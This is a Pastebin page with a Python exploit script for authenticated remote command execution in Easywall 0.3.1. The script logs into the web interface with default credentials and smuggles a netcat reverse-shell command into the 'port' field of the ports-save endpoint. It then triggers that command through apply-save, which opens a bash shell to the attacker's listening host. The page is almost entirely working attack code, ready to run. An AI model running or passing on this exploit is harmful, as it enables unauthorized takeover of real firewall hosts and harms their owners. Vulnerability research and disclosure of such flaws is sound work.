Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution
- # Date: 30-11-2023
- # Exploit Author: Melvin Mejia
- # Vendor Homepage: https://jpylypiw.github.io/easywall/
- # Software Link: https://github.com/jpylypiw/easywall
- # Version: 0.3.1
- # Tested on: Ubuntu 22.04
- import requests, json, urllib3
- urllib3.disable_warnings()
- def exploit():
- # Replace values needed here
- target_host = "192.168.1.25"
- target_port= "12227"
- lhost = "192.168.1.10"
- lport = "9001"
- user = "admin"
- password = "admin"
- target = f"https://{target_host}:{target_port}"
- # Authenticate to the app
- print("[+] Attempting login with the provided credentials...")
- login_data = {"username":user, "password":password}
- session = requests.session()
- try:
- login = session.post(f'{target}/login',data=login_data,verify=False)
- except Exception as ex:
- print("[!] There was a problem connecting to the app, error:", ex)
- exit(1)
- if login.status_code != 200:
- print("[!] Login failed.")
- exit(1)
- else:
- print("[+] Login successfull.")
- # Send the payload, the port parameter suffers from a command injection vulnerability
- print("[+] Attempting to send payload.")
- rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'
- data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}
- send_payload = session.post(f"{target}/ports-save",data=data,verify=False)
- if send_payload.status_code != 200:
- print("[!] Failed to send payload.")
- exit(1)
- else:
- print("[+] Payload sent.")
- # Trigger the execution of the payload
- print("[+] Attempting execution.")
- data = {"step_1":"", "step_2":""}
- execute = session.post(f"{target}/apply-save",data=data, verify=False)
- if execute.status_code != 200:
- print("[!] Attempt to execute failed.")
- exit(1)
- else:
- print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")
- exploit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
